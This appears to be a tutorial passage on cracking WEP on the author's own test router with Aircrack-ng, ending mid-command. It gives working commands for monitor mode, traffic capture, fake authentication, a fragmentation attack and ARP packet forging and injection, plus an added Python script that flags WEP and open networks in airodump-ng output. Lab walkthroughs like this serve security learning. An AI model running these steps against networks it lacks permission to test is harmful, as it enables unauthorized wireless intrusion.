
Introduction to Wireless Security with Aircrack-ng
Today we’re going to walk through a few WiFi testing examples using Aircrack-ng, which is a suite of wireless network security tools. It allows us to monitor and export packet data, attack access points and clients, and crack WEP and WPA keys. I’ve included some links at the bottom if anyone wants to do more research on wireless, RC4, or Aircrack-ng.
In a nutshell, we are going to set up a couple of test scenarios and then walk through some different attack methods. We’ll scan for our wireless access point (AP), set up a traffic capture, generate network traffic, and then step through different methods of recovering the wireless key. During these examples, keep in mind the complexity of the passphrase being used and the different ways those keys can be discovered. Also, as a reminder, only test against devices or networks that you own or have express written permission to test.
For these tests, here is my current hardware and setup:
I’m using a WiFi connection (not a hard line)
Kali 2018.2 (running on VMware Workstation 14 Player)
Alfa Wireless USB Adapter (Model: AWUS036NH, FCC ID: UQ2036NH, Driver: rt2800usb)
My test Access Point is a Linksys WRT54G router
Connection Type: Automatic Configuration DHCP
DHCP Server: Disabled
Note: the first time I set this up, some tinkering was needed to get this router chained off my main router.

To get started, the first thing we’ll want to do is check the wireless interface and start a quick airodump-ng scan to make certain we can detect our test AP. For the first test example, I’ll detail the parameters used, but will leave them off for the others.
iwconfig
    You should see wlan0, and it should initially show as Mode:Managed
iw dev wlan0 scan | egrep "SSID:|DS\ Parameter\ set"
    You should see the SSID for your AP and what channel it’s on:
    SSID: starmonkey
    DS Parameter set: channel 11

Originally, I was using a Backtrack 5 instance, so there are a few differences I ran into when trying to use airodump-ng with Kali 2018.2. Rather than using airmon-ng to start your wireless card in monitor mode, you may need to manually set the interface to monitor mode. These steps may not be needed with every wireless card or in every configuration, but they worked consistently for me. I’m including them in case this helps others who have had some difficulty getting airodump-ng to detect access points in later versions of Kali.
Put wlan0 into monitor mode manually:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
    (use 'mode managed' to put the card back into managed mode)
ifconfig wlan0 up
iwconfig wlan0
    wlan0 should now show as Mode:Monitor, and airodump-ng should be able to see access points

For the first example, I’ll generate a random passphrase for my router and use a fragmentation attack to recover the key.
Example #1:
Passphrase: t!k#^ADe6B&C4Cgd
Wireless Network Mode: Mixed
Wireless Network Name (ESSID): starmonkey
Wireless Channel: 11 (2.462GHz)
Security Mode: WEP
WEP Encryption: 128 bits 26 hex digits
No MAC filters enabled
Authentication Type: Auto (Shared key authentication is more secure, but all devices on your network must also support Shared Key authentication)
No connected devices for this example
Note: you may want to use 3-4 terminal windows so that you can move around easily

With wlan0 in monitor mode, we can scan through all channels, scan just one channel, or even scan for a specific AP on a single channel. This is helpful when we just want to see what’s out there but not capture any traffic. Let’s check to make sure that there aren’t any DHCP processes that may interfere with testing. This should be done before each test:
airmon-ng check
airmon-ng check kill

In the first terminal window, we’ll use airodump-ng to get the MAC address of the AP and of our wireless interface:
airodump-ng wlan0
    This will scan through the channels and display the APs that have been detected
    Ctrl+C to exit the airodump-ng screen
macchanger -s wlan0

In this case, my AP MAC is 00:14:BF:AE:15:6C, and my wireless MAC is 00:C0:CA:92:63:AE. For the first example, I’ll type out the actual MAC addresses, but for the other examples I’ll use the abbreviations as I learned them.
<AP> = the MAC of the access point
<MON> = the MAC of our wireless interface in monitor mode
<VIC> = the MAC of the connected computer or device

So, now we’re ready to start our traffic capture and target only the test device.
airodump-ng -c 11 --bssid 00:14:BF:AE:15:6C -w example1 wlan0
    -c is for the channel (11)
    --bssid is the AP MAC
    -w writes the capture information to files with this prefix (example1)
    wlan0 is the wireless interface

It should be noted that a fragmentation attack needs to be done with a MAC that is associated to the AP. Since no other devices are connected, we’ll use aireplay-ng in a second terminal window to fake-authenticate to the AP.
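As an added example (not part of the original post), here is a small Python script that reads the CSV airodump-ng writes alongside the .cap when you use -w (example1-01.csv) and flags access points still running WEP or no encryption, together with the stations associated to them. The CSV text embedded below is constructed to match the layout airodump-ng produces; its values are made up and not taken from a real capture.

```python
import csv
import io

# Constructed sample of the CSV written by "airodump-ng -w example1". Layout
# follows airodump-ng's CSV output; the rows are made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:BF:AE:15:6C, 2018-09-01 14:35:02, 2018-09-01 14:41:36, 11, 54, WEP, WEP, , -40, 312, 1520, 0. 0. 0. 0, 10, starmonkey, 
AA:BB:CC:00:11:22, 2018-09-01 14:35:04, 2018-09-01 14:41:30, 6, 130, WPA2, CCMP, PSK, -55, 290, 0, 0. 0. 0. 0, 7, homenet, 
AA:BB:CC:00:11:33, 2018-09-01 14:35:09, 2018-09-01 14:41:33, 1, 54, OPN, , , -70, 120, 0, 0. 0. 0. 0, 5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:C0:CA:92:63:AE, 2018-09-01 14:36:10, 2018-09-01 14:41:36, -30, 4100, 00:14:BF:AE:15:6C, 
"""

WEAK_PRIVACY = {"WEP", "OPN"}  # RC4-based WEP, or no encryption at all


def parse_airodump_csv(text):
    """Split the file into its AP and station sections, one dict per row."""
    aps, stations, header, section = [], [], None, None
    for row in csv.reader(io.StringIO(text)):
        row = [field.strip() for field in row]
        if not any(row):              # a blank line separates the sections
            continue
        if row[0] in ("BSSID", "Station MAC"):
            header, section = row, row[0]
            continue
        rec = dict(zip(header, row))
        (aps if section == "BSSID" else stations).append(rec)
    return aps, stations


def audit(text):
    """Flag WEP/open APs with their clients. '# IV' is the #Data counter of the
    live screen; on a WEP AP, a fast-climbing count next to an unknown
    associated station is what packet injection looks like to a defender."""
    aps, stations = parse_airodump_csv(text)
    findings = []
    for ap in aps:
        if set(ap["Privacy"].split()) & WEAK_PRIVACY:
            findings.append({
                "bssid": ap["BSSID"], "essid": ap["ESSID"],
                "channel": int(ap["channel"]), "privacy": ap["Privacy"],
                "ivs": int(ap["# IV"]),
                "clients": [s["Station MAC"] for s in stations
                            if s["BSSID"] == ap["BSSID"]],
            })
    return findings
```

Calling audit(SAMPLE_CSV) returns the starmonkey WEP network (with our own adapter listed as its only client) and the open guest network, and skips the WPA2 one.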
aireplay-ng -1 60 -e starmonkey -a 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE wlan0
    -1 is for the fake authentication (60 is the delay in seconds between re-authentications)
    -e is for the ESSID (starmonkey)
    -a is for the AP MAC
    -h is for my wifi MAC
    wlan0 is our interface

By now, you should see something similar to this on your first terminal screen:

In a third terminal window, use a fragmentation attack to obtain a .xor file:
aireplay-ng -5 -b 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE wlan0
    -5 is for a fragmentation attack
    -b is the AP MAC
    -h is the wireless MAC
    wlan0 is the interface being used
    You will be prompted to use a packet. If it is successful, a .xor file will be created with a name similar to this: fragment-0901-144136.xor

Next, use packetforge-ng to create an injectable packet and write the result to a capture file:
packetforge-ng -0 -a 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE -l 192.168.1.101 -k 192.168.1.255 -y fragment-0901-144136.xor -w fragmentation.cap
    -0 generates an ARP request packet
    -a is the AP MAC
    -h is the wireless MAC
    -l is the source IP (255.255.255.255 can sometimes be used)
    -k is the destination IP (255.255.255.255 can sometimes be used)
    -y uses the PRGA file (fragment-0901-144136.xor)
    -w writes the packet to a file (fragmentation.cap)

Once the packet has been created, we can inject it into the network to generate our #Data traffic:
aireplay-ng -2 -r fragmentation.cap wlan0
    -2 is for an interactive